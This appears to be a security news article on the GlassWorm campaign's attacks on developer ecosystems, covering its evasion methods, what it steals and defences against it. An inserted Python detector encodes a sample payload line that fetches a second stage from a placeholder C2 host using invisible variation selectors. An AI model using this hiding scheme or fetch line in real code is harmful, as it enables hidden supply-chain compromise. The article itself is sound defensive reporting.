The GlassWorm malware campaign returned this week for its third wave, targeting developers across multiple ecosystems with coordinated attacks on VS Code extensions, npm packages, Go modules, and Rust crates. Security researchers discovered 24 malicious extensions on the Microsoft and OpenVSX marketplaces on December 2, part of a broader supply chain attack that steals GitHub credentials, npm tokens, and cryptocurrency wallets and hands attackers complete control of thousands of developer machines.
Developer tools themselves have become the primary attack vector. Malicious VS Code extensions grew 4x from 27 in 2024 to 105 in the first 10 months of 2025. One fake extension alone reached 16,000+ installs before detection. When the tools developers trust daily are compromised, every downstream project becomes vulnerable.
Cross-Ecosystem Coordinated Attack
This isn’t just a VS Code problem: attackers went after several developer ecosystems at the same time. GlassWorm deployed 24 malicious VS Code extensions while threat actors published 420+ malicious npm packages, typosquatted Go UUID modules that had been live since 2021, and Rust malware loaders, all aimed at developer credentials and cryptocurrency.
The Material Icon Theme impersonation, with 16,000+ installs, shipped Rust implants. The 420 npm packages, all following the “elf-stats-*” naming pattern, open reverse shells. The September 2025 attack compromised the chalk and debug packages, collectively downloaded 2.6 billion times weekly, and reached 10% of cloud environments within 2 hours. The typosquatted Go modules github.com/bpoorman/uuid and github.com/bpoorman/uid had been live since 2021 and were only identified now. The Rust crate finch-rust is a multi-stage loader that fetches and runs the sha-rust credential stealer.
Developers cannot simply avoid one package manager or marketplace. The entire supply chain is under attack. Compromising developer machines provides access to repositories, production secrets, and downstream projects, amplifying impact exponentially.
Invisible Unicode and Blockchain C2 Defeat Traditional Defenses
GlassWorm uses evasion techniques that sidestep traditional controls. Invisible Unicode characters hide malicious code from human review and from static analysis that only inspects visible tokens. Rust-based native implants are harder to detect than JavaScript, which is what most extension scanners are built to read. Most critically, command-and-control is resolved through the Solana blockchain: the implant looks up transactions tied to a hard-coded wallet address and reads the current C2 location from them, so there is no server or domain for authorities to seize, and the operators can move C2 simply by posting a new transaction.
Instead of a JavaScript payload, the extensions ship native libraries, os.node for Windows and darwin.node for macOS. The implants pull C2 details from Solana, with Google Calendar events as a fallback in which backup C2 addresses are hidden in event titles using the same invisible Unicode. The finch-rust crate is mostly legitimate code with a single malicious line that loads the payload, a split that lets the crate itself pass casual static review.
Developers who rely on code review cannot see invisible Unicode. Security tools that only scan JavaScript miss native Rust implants. Law enforcement cannot seize infrastructure that lives on a public blockchain. Traditional defenses are insufficient on their own.
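The invisible-Unicode point above is easy to check for mechanically. The following Python script is an added example, not code from the article or from the GlassWorm campaign: it flags runs of format characters and variation selectors in source text and, where a run is made only of variation selectors, decodes it back to bytes. The byte-to-variation-selector mapping in encode_vs/decode_vs is the one from public write-ups of this smuggling technique; whether any given sample uses exactly that mapping is an assumption. The sample JavaScript, the hidden payload and the c2.example.invalid host are constructed for the demonstration.

```python
"""Find invisible Unicode runs in source text and try to decode them.

Added example, not code from the article or from GlassWorm. It flags Unicode
format characters (category Cf) plus the variation-selector and Tags ranges,
which render as nothing in editors but are NOT category Cf, so a naive
"format character" filter misses them. The byte-to-variation-selector mapping
in encode_vs/decode_vs is the scheme from public write-ups of the technique;
whether any given sample uses exactly that mapping is an assumption.
"""
from __future__ import annotations

import unicodedata
from dataclasses import dataclass

VS_BASE = 0xFE00        # Variation Selectors VS1..VS16 (category Mn)
VS_SUPP_BASE = 0xE0100  # Variation Selectors Supplement VS17..VS256 (Mn)
TAGS_BASE = 0xE0000     # Tags block, also invisible
INVISIBLE_RANGES = (
    (VS_BASE, VS_BASE + 0x0F),
    (VS_SUPP_BASE, VS_SUPP_BASE + 0xEF),
    (TAGS_BASE, TAGS_BASE + 0x7F),
)


def is_invisible(ch: str) -> bool:
    cp = ord(ch)
    if any(lo <= cp <= hi for lo, hi in INVISIBLE_RANGES):
        return True
    # Cf covers zero-width space/joiner, bidi overrides (Trojan Source), etc.
    return unicodedata.category(ch) == "Cf"


@dataclass
class Finding:
    line: int    # 1-based
    col: int     # 1-based column of the first invisible code point
    length: int  # consecutive invisible code points


def scan_text(text: str) -> list[Finding]:
    """One Finding per run of invisible code points; a leading BOM is ignored."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        col = 1 if lineno == 1 and line.startswith("\ufeff") else 0
        while col < len(line):
            if not is_invisible(line[col]):
                col += 1
                continue
            start = col
            while col < len(line) and is_invisible(line[col]):
                col += 1
            findings.append(Finding(lineno, start + 1, col - start))
    return findings


def encode_vs(data: bytes) -> str:
    """Bytes 0-15 -> U+FE00..U+FE0F, bytes 16-255 -> U+E0100..U+E01EF."""
    return "".join(chr(VS_BASE + b) if b < 16 else chr(VS_SUPP_BASE + b - 16) for b in data)


def decode_vs(run: str) -> bytes | None:
    """Inverse of encode_vs; None if the run is not purely variation selectors."""
    out = bytearray()
    for ch in run:
        cp = ord(ch)
        if VS_BASE <= cp <= VS_BASE + 0x0F:
            out.append(cp - VS_BASE)
        elif VS_SUPP_BASE <= cp <= VS_SUPP_BASE + 0xEF:
            out.append(cp - VS_SUPP_BASE + 16)
        else:
            return None
    return bytes(out)


def hidden_runs(text: str) -> list[tuple[Finding, bytes | None]]:
    """Pair each finding with its decoded payload (None if not VS-encoded)."""
    lines = text.splitlines()
    return [(f, decode_vs(lines[f.line - 1][f.col - 1 : f.col - 1 + f.length]))
            for f in scan_text(text)]


# Constructed sample: an icon-theme entry file whose second line carries a
# smuggled payload. In an editor both lines look like plain JavaScript.
HIDDEN_PAYLOAD = b"fetch('https://c2.example.invalid/stage2')"  # placeholder host
SAMPLE_JS = (
    "const theme = require('./icons.json');\n"
    "module.exports = theme;" + encode_vs(HIDDEN_PAYLOAD) + "\n"
    "// \u202e  this comment hides a right-to-left override\n"
)

if __name__ == "__main__":
    for finding, payload in hidden_runs(SAMPLE_JS):
        where = f"line {finding.line} col {finding.col}: {finding.length} invisible code points"
        print(where, f"-> {payload!r}" if payload else "(not a variation-selector payload)")
```

Run it against the files under an extension's directory rather than against the marketplace page: the marketplace renders source for display, and a run of variation selectors survives that rendering unseen. The Cf check alone is not enough, because variation selectors are category Mn, which is why the explicit ranges are listed.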
4x Growth and Massive Scale
The numbers tell a stark story. Malicious VS Code extensions increased 4x in 2025, from 27 in 2024 to 105 in the first 10 months. Individual campaigns show massive reach: the fake Material Icon Theme had 16,000+ installs before removal. The September npm attack reached 10% of cloud environments in just 2 hours. The Beamglea campaign deployed 175 malicious packages with 26,000 combined downloads targeting 135 companies.
The attack surface is exploding. VS Code commands 70%+ developer market share. npm packages see billions of weekly downloads. When attackers compromise tools used by millions of developers daily, a single malicious package propagates through thousands of projects in hours. The September attack proved this—10% penetration in 120 minutes.
Total System Compromise
GlassWorm steals far more than code. The malware harvests GitHub, npm, and OpenVSX credentials. It targets 49 different cryptocurrency wallet types. It captures screenshots, clipboard contents, and Wi-Fi passwords. It hijacks browser sessions via headless Chrome and Edge. It deploys hidden VNC servers for complete remote access. It turns developer machines into SOCKS proxy botnets.
As security researcher Idan Dardikman from Koi Security warns: “Your code. Your emails. Your Slack DMs. Whatever’s on your screen, they’re seeing it too.”
This is total system compromise, not just code theft. Stolen GitHub credentials open private repositories and intellectual property. npm tokens allow publishing malicious updates to packages the victim maintains, turning one infected developer into the next supply chain wave. VNC access enables long-term espionage. Once compromised, developers must assume complete exposure: rotate every credential, revoke tokens and active sessions, and treat the machine as untrusted until it is rebuilt.
How to Protect Yourself
Developers can take immediate action. Audit installed extensions and remove unused ones. Inspect what an extension actually ships: VS Code has no runtime permission model, so any extension that declares a code entry point runs with your full user privileges, and an icon theme has no reason to declare one, to request activation events, or to bundle native binaries or network code. Verify publisher identities through the marketplace’s blue verified badge, bearing in mind that the badge proves control of a domain, not that the code is safe. Enable 2FA on GitHub, npm, and OpenVSX accounts. Use the VSCan tool for static extension analysis. Monitor network egress from development machines.
VS Code v1.97+ includes trust dialogs for third-party publishers and signature verification. Microsoft’s Private Marketplace, introduced in November 2025, gives enterprises corporate-controlled extension curation. Microsoft reviewed 136 extensions this year and removed 110—an 81% removal rate—with average 1-business-day response to community reports.
Most protection steps take minutes. Reviewing extensions, checking what they ship, and enabling 2FA block the common cases, though 2FA does nothing for tokens and browser sessions an implant reads straight from disk, which is why stolen npm tokens still have to be revoked. The Private Marketplace gives enterprises control over what developers can install. Awareness and basic hygiene sharply reduce the chance of compromise.
Key Takeaways
- GlassWorm’s third wave demonstrates persistent, evolving threats targeting developer tools across VS Code, npm, Go, and Rust ecosystems simultaneously
- Malicious VS Code extensions increased 4x in 2025 (27 → 105), with one fake extension reaching 16,000+ installs and the September npm attack compromising 10% of cloud environments in 2 hours
- Advanced evasion techniques—invisible Unicode, Rust implants, blockchain C2 infrastructure—defeat traditional security defenses including code review and law enforcement takedowns
- Total system compromise includes GitHub/npm credentials, 49 cryptocurrency wallet types, browser sessions, VNC remote access, and botnet recruitment beyond simple code theft
- Immediate protection: audit extensions, verify publishers, inspect what extensions ship (an icon theme should declare no entry point and bundle no native binaries or network code), enable 2FA, use the VSCan security tool, and adopt the Private Marketplace for enterprises